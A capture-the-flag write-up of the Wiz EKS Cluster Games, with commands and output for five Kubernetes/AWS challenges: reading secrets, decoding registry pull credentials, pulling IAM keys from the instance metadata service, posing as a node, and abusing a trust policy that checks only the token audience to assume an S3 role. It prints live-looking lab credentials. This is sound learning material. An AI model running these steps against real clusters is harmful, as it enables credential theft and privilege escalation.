EKS Cluster Games Challenge
Introduction
I recently had a lot of fun doing the EKS Cluster Games by Wiz. I’ve also been meaning to get into writing up these kinds of activities, and this felt like a great one to start on.
The EKS Cluster Games are a series of five EKS challenges that start you off in a low-privileged EKS pod with a web shell for access.
Challenge 1
The first challenge had the description: "Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?"
The first thing I tend to do in these circumstances is check whether I have kubectl and a valid token. Usually I go straight into checking my permissions.
For this one, though, I thought I’d skip ahead slightly and go straight for the secrets:
root@wiz-eks-challenge:~# kubectl get secrets
NAME         TYPE     DATA   AGE
log-rotate   Opaque   1      9d
Hmmm… that doesn’t seem like it’d be a flag, but you never know.
root@wiz-eks-challenge:~# kubectl get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T13:02:08Z"
    name: log-rotate
    namespace: challenge1
    resourceVersion: "890951"
    uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
The secret name lied! There is a flag inside. Secret data is base64-encoded, so a quick decode gets us the first flag.
root@wiz-eks-challenge:~# base64 -d <<< d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
wiz_eks_challenge{omg_over_privileged_secret_access}
Challenge 2
The next challenge takes us into container registries: "A thing we learned during our research: always check the container registries"
So the first step is likely to be finding the URL of the registry. If there are any pods, the image field in the pod spec should at least point us in the right direction.
root@wiz-eks-challenge:~# kubectl get pods -o yaml
apiVersion: v1
items:
[..SNIP..]
    - image: eksclustergames/base_ext_image
      imagePullPolicy: Always
      name: my-container
      resources: {}
      terminationMessagePath: /dev/termination-log
      terminationMessagePolicy: File
      volumeMounts:
      - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
        name: kube-api-access-cq4m2
        readOnly: true
    dnsPolicy: ClusterFirst
    enableServiceLinks: true
    imagePullSecrets:
    - name: registry-pull-secrets-780bab1d
    nodeName: ip-192-168-21-50.us-west-1.compute.internal
    preemptionPolicy: PreemptLowerPriority
[..SNIP..]
Looking at the image field, it looks like the registry is Docker Hub, as no other registry URL is specified and that’s usually a good bet as the default. The pod spec also contained an imagePullSecret; these are used by Kubernetes to pull images that require authentication.
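For context, this kind of secret is typically created with something along these lines (the name and values here are purely illustrative), and Kubernetes then references it from the pod's imagePullSecrets when pulling the image:
kubectl create secret docker-registry regcred \
    --docker-server=index.docker.io \
    --docker-username=<username> \
    --docker-password=<token>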
root@wiz-eks-challenge:~# kubectl get secret registry-pull-secrets-780bab1d -o yaml
apiVersion: v1
data:
  .dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
kind: Secret
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:31:29Z"
  name: registry-pull-secrets-780bab1d
  namespace: challenge2
  resourceVersion: "897340"
  uid: 1348531e-57ff-42df-b074-d9ecd566e18b
type: kubernetes.io/dockerconfigjson
root@wiz-eks-challenge:~# base64 -d <<< eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19; echo
{"auths": {"index.docker.io/v1/": {"auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="}}}
We can get to it, excellent, and it confirms our suspicion that the registry is Docker Hub. We can decode the base64 auth token to get the username and password and log in to Docker Hub. Wiz were nice and had crane pre-installed. When I was doing this originally I hadn’t really used it before, so I did the challenges with docker, dive, etc., but I spent some time learning it afterwards and this time I’ll try it with crane.
root@wiz-eks-challenge:~# base64 -d <<< ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw==; echo
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
root@wiz-eks-challenge:~# crane auth login -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo index.docker.io
2023/11/11 01:59:43 logged in via /home/user/.docker/config.json
Now we’ve authenticated, let’s see what tags exist for the image the pod was using (eksclustergames/base_ext_image).
root@wiz-eks-challenge:~# crane ls eksclustergames/base_ext_image
latest
Hmm… just the one. Let’s pull it and see if there is anything in the image itself, such as in the layers or the config.
root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image | jq
{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:18.920734382Z",
  "history": [
    [..SNIP..]
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' > /flag.txt # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
Ah excellent, the flag is in the image filesystem, but since it was added via a RUN command in the Dockerfile, it also shows up in the history in the config.
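Incidentally, if we wanted the file itself rather than the history entry, exporting the image filesystem with crane should also do the trick; a sketch, assuming the file sits at /flag.txt as the history suggests:
# flatten the image filesystem to a tar stream and pull out flag.txt
crane export eksclustergames/base_ext_image:latest - | tar -xOf - flag.txt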
Challenge 3
Oh, now we need to go through an image's layers: "A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret."
Let’s just quickly double check we are using the same registry.
root@wiz-eks-challenge:~# kubectl get pods -o yaml | grep -i image
- image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
imagePullPolicy: IfNotPresent
image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
Oh, a different registry, and no imagePullSecrets either. Looking at the registry URL, that looks to be the format of ECR, AWS’s Elastic Container Registry. These typically do require authentication to pull images from; it’s likely the node itself has credentials through its IAM instance role, which would explain why there are no imagePullSecrets.
A quick sts get-caller-identity suggests no credentials, but directly querying IMDS does retrieve a set of access keys:
root@wiz-eks-challenge:~# aws sts get-caller-identity
Unable to locate credentials. You can configure credentials by running "aws configure".
root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/
eks-challenge-cluster-nodegroup-NodeInstanceRoleroot@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
{"AccessKeyId":"ASIA2AVYNEVMYXNB6AZS","Expiration":"2023-11-11 03:08:34+00:00","SecretAccessKey":"gIkSQe5FnYuY8B3dsemZM45H/+Bfr3Wjw4VepURY","SessionToken":"FwoGZXIvYXdzENT//////////wEaDE5LCHhwL0GDSWLq6CK3Ae6Tq7fE873OeuyL6MY+Rjnw39ImNbOmmmEUvyZKJtyIqI2jBQ4CzCqsnuLPkz5B2gNqmlksttlPlPCN4TNKIjz+K/V+xTgKbUBA3OF1VFKWtmXLYlB3NTuhn+629vYUc3PjqSjed7VrWHlcOKqlI32CRlMRa+w8Oeru2NPsLPBTtGs9M/uH3z1khn/52qytdDHbn0pWXQ6RGGG3X1Wu6bIezHrvrtwksFStb4M+boo1zYDJIa0ZAiiixLuqBjItX6bfCJvOiuWergt7TJ5kIII6YDQu8LxDtWiG43fLM/6zRQGa6RgblfHeinxB"}
That’s fine, we can just load them manually into environment variables and carry on.
root@wiz-eks-challenge:~# export AWS_ACCESS_KEY_ID=ASIA2AVYNEVMYXNB6AZS
root@wiz-eks-challenge:~# export AWS_SECRET_ACCESS_KEY=gIkSQe5FnYuY8B3dsemZM45H/+Bfr3Wjw4VepURY
root@wiz-eks-challenge:~# export AWS_SESSION_TOKEN=FwoGZXIvYXdzENT//////////wEaDE5LCHhwL0GDSWLq6CK3Ae6Tq7fE873OeuyL6MY+Rjnw39ImNbOmmmEUvyZKJtyIqI2jBQ4CzCqsnuLPkz5B2gNqmlksttlPlPCN4TNKIjz+K/V+xTgKbUBA3OF1VFKWtmXLYlB3NTuhn+629vYUc3PjqSjed7VrWHlcOKqlI32CRlMRa+w8Oeru2NPsLPBTtGs9M/uH3z1khn/52qytdDHbn0pWXQ6RGGG3X1Wu6bIezHrvrtwksFStb4M+boo1zYDJIa0ZAiiixLuqBjItX6bfCJvOiuWergt7TJ5kIII6YDQu8LxDtWiG43fLM/6zRQGa6RgblfHeinxB
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
    "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
Perfect. With these credentials, hopefully we can authenticate and pull data from ECR. We can use aws ecr get-login-password to generate ourselves a password, and then log in with the username AWS.
root@wiz-eks-challenge:~# aws ecr get-login-password | crane auth login -u AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
2023/11/11 02:11:21 logged in via /home/user/.docker/config.json
Now that we’re authenticated, let’s go down the same path as before and list the tags, but this time pull the filesystem instead of the config.
root@wiz-eks-challenge:~# crane ls 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c
374f28d8-container
root@wiz-eks-challenge:~# crane export 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container image.tar
root@wiz-eks-challenge:~# ls -l image.tar
-rw-r--r-- 1 root root 4493312 Nov 11 02:13 image.tar
root@wiz-eks-challenge:~# tar xvf image.tar
etc
proc
sys
[..SNIP..]
root@wiz-eks-challenge:~# grep -ri wiz_eks_challenge
Guess it won’t be as easy as just grepping the overall filesystem. Let’s go through the config again then, and actually see what these layers are. In the past I’ve seen cases where a flag is added in one layer and then deleted in a later one; maybe that’s the case here.
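As an aside, crane can also be pointed at individual layers; something roughly like this lists the layer digests and then the contents of one (the digest below is just a placeholder):
# list layer digests from the manifest
crane manifest 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container | jq -r '.layers[].digest'
# list the files inside a single (gzipped tar) layer
crane blob 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:<digest> | tar -tvzf -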
root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container | jq
{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:07.782534085Z",
  "history": [
    [..SNIP..]
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    [..SNIP..]
Oh, it’s similar to before, just a temporary environment variable instead of something written to the filesystem. I guess I did the previous challenge the slightly unintended way, going through the config rather than the filesystem. Moving on.
Challenge 4
Ah, the next one is breaking out to the underlying node, or at least getting to the node's kubelet account: "You're inside a vulnerable pod on an EKS cluster. Your pod's service-account has no permissions. Can you navigate your way to access the EKS Node's privileged service-account?"
At this point I also notice the View Permissions button; was that there the entire time?
There are two immediate ways that come to mind when thinking about breaking out onto an EKS node. One is doing an actual container breakout; the second is going through IMDS and the IAM credentials within, as that’s how EKS nodes typically authenticate. Funnily enough, we literally did that two seconds ago in challenge 3, so we clearly have access to the node’s IAM role. Do we still have those credentials?
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
    "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
Looks like it. Now we have the role, we just need the cluster name in AWS so we can generate a kubeconfig file. Checking ~/.kube/config for the existing name suggests localcfg, which doesn’t sound right, but it’s worth a shot.
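(For what it's worth, the name I was looking at can be pulled straight out of the current context like this; it's only the kubeconfig entry name though, not necessarily the real EKS cluster name, which is exactly the problem here:)
kubectl config view --minify -o jsonpath='{.clusters[0].name}'; echo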
root@wiz-eks-challenge:~/.kube# aws eks update-kubeconfig --name localcfg
An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/localcfg
No luck; maybe I don’t have permissions for update-kubeconfig. Under the hood, the main thing this sets up is a kubeconfig file pointing at the correct API server, with authentication configured to use aws eks get-token. We can probably just do that manually. From my notes archive, I quickly pull up the format the kubeconfig is set to and extract the parts relevant to the AWS authentication:
users:
- name: name
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: aws
      args:
      - --region
      - $region_code
      - eks
      - get-token
      - --cluster-name
      - $cluster_name
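It's worth noting kubectl is effectively just shelling out to aws eks get-token here, so the token generation itself can be sanity-checked by hand; a sketch, with the cluster name still to be determined:
aws eks get-token --cluster-name <cluster_name> --region us-west-1 | jq -r '.status.token'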
We can quickly tweak this a tad and put it into the existing config at ~/.kube/config (after backing it up, of course).
root@wiz-eks-challenge:~/.kube# cat config | tail
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: aws
      args:
      - --region
      - us-west-1
      - eks
      - get-token
      - --cluster-name
      - localcfg
root@wiz-eks-challenge:~/.kube# kubectl get -A secret
error: You must be logged in to the server (Unauthorized)
As predicted, it didn’t work. Seems we need another way to find the name. The next logical place to check would be the user data script in IMDS:
root@wiz-eks-challenge:~# curl 169.254.169.254/latest/user-data
{}
Damn, it’s empty. After a bit of thinking and poking around, I look at the node’s role ARN (arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282). Could this just be following a naming scheme, with the cluster name being as simple as eks-challenge-cluster? Swapping out the cluster name and giving it a shot:
root@wiz-eks-challenge:~# kubectl get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot list resource "secrets" in API group "" at the cluster scope
Excellent, that looks like the username format for a node, with the system:node prefix. Now just to find the flag. Initial enumeration suggested different permissions from what a node typically has: I quickly checked its actual permissions through auth can-i --list and got nothing. I then realised I was querying the challenge3 namespace, as that was still set in the kubeconfig file. Switching to the challenge4 namespace reveals a few things:
root@wiz-eks-challenge:~/.kube# kubectl auth can-i --list -n challenge4
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs   Resource Names   Verbs
serviceaccounts/token                           []                  [debug-sa]       [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
pods                                            []                  []               [get list]
secrets                                         []                  []               [get list]
serviceaccounts                                 []                  []               [get list]
[..SNIP..]
It can get secrets; let’s see if there’s a flag in there again.
root@wiz-eks-challenge:~/.kube# kubectl get secret -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T12:27:57Z"
    name: node-flag
    namespace: challenge4
    resourceVersion: "883574"
    uid: 26461a29-ec72-40e1-adc7-99128ce664f7
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
root@wiz-eks-challenge:~/.kube# base64 -d <<< d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}
Onwards.
Challenge 5
Now we need to move to AWS: "You've successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?"
Funnily enough, earlier this year I had built a similar challenge for an internal CTF, so I had a strong inkling what sort of issue we might be leveraging here. Skimming the trust policy confirmed my suspicion, the relevant part being:
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
This enforces that the JWT generated by the API server has the aud set to sts.amazonaws.com, but it doesn’t validate any other field such as the sub, which defines the service account the token is for. Checking permissions within Kubernetes, it looks like we have create on serviceaccounts/token; with this it’s possible for us to generate our own tokens for service accounts. kubectl create token also has a flag that lets us customise the aud field ;) First thing, let’s find a service account we can use.
root@wiz-eks-challenge:~# kubectl get sa
NAME          SECRETS   AGE
debug-sa      0         10d
default       0         10d
s3access-sa   0         10d
The obvious one to choose there is s3access-sa, right?
root@wiz-eks-challenge:~# kubectl create token s3access-sa
error: failed to create token: serviceaccounts "s3access-sa" is forbidden: User "system:node:challenge:ip-192-168-21-50.us-west-1.compute.internal" cannot create resource "serviceaccounts/token" in API group "" in the namespace "challenge5"
Never mind; let’s see what we can create tokens on.
root@wiz-eks-challenge:~# kubectl auth can-i --list | grep token
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
serviceaccounts/token [] [debug-sa] [create]
Ah, we can only create tokens for the debug-sa service account. Well, that’s not really an issue, as AWS should just be checking the aud field, and not the sub.
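(For contrast, a non-vulnerable trust policy would typically also pin the sub claim to the intended service account, roughly like this:)
"Condition": {
    "StringEquals": {
        "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com",
        "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:sub": "system:serviceaccount:challenge5:s3access-sa"
    }
}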
root@wiz-eks-challenge:~# kubectl create token debug-sa
eyJhbGciOiJSUzI1NiIsImtpZCI6IjZkMjNjYTkwMGI2MTVhYWJmNTBmYWJlZDc0NzA1OTNiNjIyMDA5NmYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTY5OTY3NDg2MiwiaWF0IjoxNjk5NjcxMjYyLCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2U1Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlYnVnLXNhIiwidWlkIjoiNmNiNjAyNGEtYzRkYS00N2E5LTkwNTAtNTljOGM3MDc5OTA0In19LCJuYmYiOjE2OTk2NzEyNjIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2U1OmRlYnVnLXNhIn0.gMfWrwtXqYwM_DTcJfY04o6As-sIj1vdIPre7g2FdEsjFd-w4MwFQucn74dud8ZplEogbdTeloxt47_ZfujQLZFd66d2YZ7mpYVtCZALtX3xRzIx-MCq63XFtuMiqf_7x_763zPRKvzbwkf9qQs1Pd8S8Ldcpd_76xJJZ80NPNHtv_FQLJSh1Uy0On6x6roiZjQVzNID3kWzZ-b02vtTxrJhLpbrJxaSFqGtPXS5htxs1HTUmpVkhnhRH7h6zlQ2H8lEqGsAyAMFYfsjykdXf6Tq5vkookZiRdIc98YirT9V_XY93hCqkW6U9KPOLtJeaYa7MIhU_uy8zBrs1Yqvsg
OK, we can generate tokens for this service account. The above token still has the default audience of the Kubernetes API server, but we can change that with the --audience flag.
root@wiz-eks-challenge:~# kubectl create token debug-sa --audience=sts.amazonaws.com
eyJhbGciOiJSUzI1NiIsImtpZCI6IjZkMjNjYTkwMGI2MTVhYWJmNTBmYWJlZDc0NzA1OTNiNjIyMDA5NmYifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNjk5Njc0OTI2LCJpYXQiOjE2OTk2NzEzMjYsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTY5OTY3MTMyNiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.WK4hZKiG058s9I2uIajISwrwNUmYfblu3V1poOvxuK83wKTbggVDJTNZiTaqLB0wCvgt1hqHNDp9XE8rrwYQgx41g7NlBKqn1VD8G_qhIFUJ-4HQtfrlxDfffd5ZHus970RfyADAB6Ld1d7I0HuficOAu2BLRe3caxGxZcH82zRov4SWsxaB8H5yz9WiCYQCKG_D8X9e8gpryrbP3U6bRloTViTNo_hziYgABNpbqQbHALuQl3FMTGNpZ6-qu9LalV9FxMYXgY_KNxZ6HkwrkNWzFojorr1A4MojxyeG6DwyLd7Wdr7lmPiNPw3EqTzmWGY7G49bTQChKpbuJx8xjg
Now we have the token, we just need the role ARN. The typical way this is configured is an annotation on the service account, which the EKS mutating webhook reads in order to inject the relevant environment variables into pods.
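(For pods actually using the annotated service account, the webhook injects roughly the following into the pod spec; a simplified sketch of the usual IRSA injection:)
env:
- name: AWS_ROLE_ARN
  value: arn:aws:iam::688655246681:role/challengeEksS3Role
- name: AWS_WEB_IDENTITY_TOKEN_FILE
  value: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
volumeMounts:
- mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount
  name: aws-iam-token
  readOnly: true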
root@wiz-eks-challenge:~# kubectl get sa s3access-sa -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
  creationTimestamp: "2023-10-31T20:07:34Z"
  name: s3access-sa
  namespace: challenge5
  resourceVersion: "671916"
  uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
There it is. Now we can authenticate to AWS and assume the role. Luckily, the AWS CLI can do this for us if we give it the token and the ARN we would like to assume.
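The CLI picks these up from the AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN_FILE environment variables and calls sts:AssumeRoleWithWebIdentity under the hood; the explicit equivalent would be roughly this (the session name is arbitrary):
aws sts assume-role-with-web-identity \
    --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role \
    --role-session-name debug-sa-session \
    --web-identity-token file://token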
root@wiz-eks-challenge:~# export AWS_ROLE_ARN=arn:aws:iam::688655246681:role/challengeEksS3Role
root@wiz-eks-challenge:~# kubectl create token debug-sa --audience=sts.amazonaws.com > token
root@wiz-eks-challenge:~# export AWS_WEB_IDENTITY_TOKEN_FILE=$PWD/token
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
    "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
Odd. Oh, I probably still have the environment variables set for assuming the node’s instance profile; I guess the CLI checks those first, before this method. Let’s try disabling that.
root@wiz-eks-challenge:~# export AWS_ACCESS_KEY_ID=""
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
    "UserId": "AROA2AVYNEVMZEZ2AFVYI:botocore-session-1699671587",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/botocore-session-1699671587"
}
Excellent, now we’ve assumed the required role; let’s get the flag. We can get the bucket name and key from the IAM policy.
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag -
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}